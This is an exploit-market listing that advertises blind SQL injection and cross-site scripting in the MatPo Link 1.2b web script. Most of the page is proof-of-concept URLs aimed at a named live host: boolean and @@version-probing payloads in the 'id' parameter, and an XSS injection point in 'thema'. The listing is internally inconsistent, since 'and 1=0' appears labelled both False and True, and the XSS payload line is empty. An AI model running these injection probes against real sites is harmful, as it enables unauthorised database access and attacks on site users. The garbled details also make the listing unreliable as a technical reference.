[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4048
Category
web applications
Date add
03-11-2008
Platform
unsorted
==================================================================
MatPo Link 1.2b (Blind SQL Injection/XSS) Multiple Vulnerabilities
==================================================================


# [~] Discovered by : Hakxer
# [~] Type Gap : Blind Sql inj / XSS
# [~] Script :MatPo Link 1.2b
# [~] Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

|| Blind Sql Inj ||
 POC: http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+[BSQL]
  Exploit :
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 False
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+1=0 True 
  
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=5 True
  http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12+and+substring(@@version,1,1)=4 False
		
|| Cross Site Scripting ||
Poc:
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=[XSS]
Exploit
http://hilfe-forum.pytalhost.de/linkliste/view.php?id=12&thema=

#  Proud To be a Muslim #
#_=END=_#



#  0day.today [2024-11-14]  #